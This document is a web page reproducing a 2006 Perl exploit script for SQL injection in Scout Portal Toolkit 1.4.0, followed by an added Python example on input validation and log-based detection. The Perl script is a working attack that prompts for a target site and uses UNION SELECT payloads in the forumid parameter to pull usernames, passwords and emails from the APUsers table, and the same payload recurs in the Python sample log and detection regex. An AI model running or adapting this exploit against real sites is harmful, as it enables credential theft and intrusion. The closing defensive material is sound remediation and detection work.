ghici

Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit

```perl
#!/usr/bin/perl
#===============================================================
# Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit
# Coded By Simo64
# Moroccan Security Research Team
# Special thx to :Greetz :
# CiM-Team - CrAsH_oVeR_rIdE - dabdoub - damip - DarkbiteX - drackanz - Iss4m - megamati
# Mourad - Preddy -Rachid - RapYaS - r00tkita - S4mi - secteura - Silitix - tahati - And All Friends !
#===============================================================
# Details :
# Scout Portal Toolkit 1.4.0 Remote SQL injection Vulnerability
# Website : http://scout.wisc.edu/Projects/SPT/
# Vulnerable File : SPT--ForumTopics.php
# PoC : http://host/path/SPT--ForumTopics.php?forumid=
# Example :
# This will display admin name and password
# Exploit : http://victime/path/SPT--ForumTopics.php?f...+WHERE+UserId=1
# The exploit will work regardless of whether magic_quotes_gpc is set or not
#==============================================================

use LWP::Simple;

print "\n===============================================================";
print "\n= Scout Portal Toolkit <= 1.4.0 Remote SQL injection Exploit =";
print "\n= Discovered & Coded By Simo64 =";
print "\n= Moroccan Security Research Team =";
print "\n===============================================================\n\n";

my($targ,$path,$userid,$xpl,$xpl2,$data,$data2,$email);

print "Enter Target Example: http://site.com/ \nTarget : ";
chomp($targ = <STDIN>);

print "\n\nEnter Path TO Portal example: /SPT/ OR just / \nPath : ";
chomp($path=<STDIN>);

print "\n\nEnter userid Example: 1\nUserID : ";
chomp($userid=<STDIN>);

$xpl1="-9+UNION+SELECT+null,UserName,UserPassword,null,null,null+FROM+APUsers+WHERE+UserId=";
$xpl2="-9+UNION+SELECT+null,Email,null,null,null,null+FROM+APUsers+WHERE+UserId=";

print "\n[+] Connecting to: $targ\n";

$data = get($targ.$path."SPT--ForumTopics.php?forumid=".$xpl1.$userid) || die "\n[+]Connection Failed!\n";
$data2 = get($targ.$path."SPT--ForumTopics.php?forumid=".$xpl2.$userid) || die "\n[+]Connection Failed!\n";

print "\n[+] Connected !\n";
print "[+] Sending Data to $targ ....\n\n";

$username=substr($data,index($data,"<h1>")+11,index($data,"</h1>")-12);
chomp $username;

$password=substr($data,index($data,"</h1>")+34,index($data,"</p>")-index($data,"</h1>")-34);
chomp $password;

$email=substr($data2,index($data,"<h1>")+11,index($data2,"</h1>")-12);
chomp $email;

if(length($password) <= 34){
print "[!]Exploit Succeeded !\n********************\n\n========= UserID = $userid Infos =======";
print "\n= UserID : ".$userid;
print "\n= Username : ".$username;
print "\n= Password : ".$password;
print "\n= Email : ".$email;
print "\n===================================\n\nEnjoy !";
}
else {print "\n[!] Exploit Failed !";}

# milw0rm.com [2006-06-27]
```
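The header of the posted script makes two defender-relevant points: the injection lands in a numeric parameter (`forumid`), and it works whether or not `magic_quotes_gpc` is enabled. The Python below is an added example, not part of the original post or of the Scout Portal Toolkit code base. It shows why quote escaping is irrelevant for a quote-free payload in a numeric context, what strict integer validation of `forumid` looks like, and a small detector that flags such requests in Common Log Format access logs. The `addslashes` mimic, the log lines and the IP addresses are constructed for illustration; the `forumid` parameter, script name and `UNION SELECT ... FROM APUsers` shape come from the post.

```python
"""Why magic_quotes_gpc does not stop numeric-context SQL injection, what a
strict check looks like, and how to spot such requests in access logs.
Added example; not code from the original post or from the SPT project."""
import re
from urllib.parse import urlsplit, parse_qs


def addslashes(s: str) -> str:
    """Mimic PHP's magic_quotes_gpc: backslash-escape quotes, backslashes and NUL.
    (Constructed approximation of PHP's addslashes(), enough for the point here.)"""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\0", "\\0"))


def magic_quotes_changes(payload: str) -> bool:
    """True if addslashes() altered the payload at all. A UNION payload aimed at a
    numeric parameter needs no quote characters, so it passes through unchanged,
    which is why the post notes the exploit works with magic_quotes_gpc on or off."""
    return addslashes(payload) != payload


def is_valid_forumid(raw: str) -> bool:
    """Strict validation for a numeric id: decimal digits only, bounded length.
    Anything else (sign, spaces, SQL keywords, quotes) is rejected outright."""
    return re.fullmatch(r"[0-9]{1,10}", raw) is not None


def forumid_safe(raw: str) -> int:
    """Convert a validated forumid to int; raise on anything that is not a plain id."""
    if not is_valid_forumid(raw):
        raise ValueError(f"invalid forumid: {raw!r}")
    return int(raw)


# Detection: a UNION ... SELECT sequence inside any query-string value.
UNION_RE = re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.IGNORECASE)

# Apache/nginx Common Log Format (constructed sample lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def inspect_request_uri(request_uri: str, numeric_params=("forumid",)) -> list[str]:
    """Return findings for one request URI (empty list when nothing is suspicious).
    parse_qs decodes '+' to space and %XX escapes, so the check sees the real value."""
    findings = []
    params = parse_qs(urlsplit(request_uri).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if name.lower() in numeric_params and not is_valid_forumid(value):
                findings.append(f"non-numeric {name}={value!r}")
            if UNION_RE.search(value):
                findings.append(f"UNION SELECT in {name}")
    return findings


def scan_log(text: str) -> list[dict]:
    """Run inspect_request_uri over every parseable log line; return alert records."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_request_uri(m["uri"])
        if findings:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "uri": m["uri"],
                           "findings": findings})
    return alerts


# Constructed sample log: one benign request, one UNION injection in forumid,
# one single-quote probe (forumid=3%27).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jun/2006:10:00:01 +0000] "GET /SPT/SPT--ForumTopics.php?forumid=3 HTTP/1.1" 200 5120
10.0.0.9 - - [27/Jun/2006:10:00:07 +0000] "GET /SPT/SPT--ForumTopics.php?forumid=-9+UNION+SELECT+null,UserName,UserPassword,null,null,null+FROM+APUsers+WHERE+UserId=1 HTTP/1.1" 200 2210
10.0.0.9 - - [27/Jun/2006:10:00:09 +0000] "GET /SPT/SPT--ForumTopics.php?forumid=3%27 HTTP/1.1" 200 480
"""

if __name__ == "__main__":
    union_payload = "-9 UNION SELECT null,UserName,UserPassword,null,null,null FROM APUsers WHERE UserId=1"
    print("magic_quotes alters UNION payload:", magic_quotes_changes(union_payload))
    print("strict check accepts it:", is_valid_forumid(union_payload))
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["ts"], alert["findings"])
```

The validation side is the real fix: a forum id should be cast or validated as an integer (or bound as a typed parameter in a prepared statement) before it reaches the query, because no amount of quote escaping touches a payload that contains no quotes. The log scanner is intentionally narrow; in practice you would list every parameter your application treats as numeric, and feed alerts into whatever pipeline already consumes your access logs.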
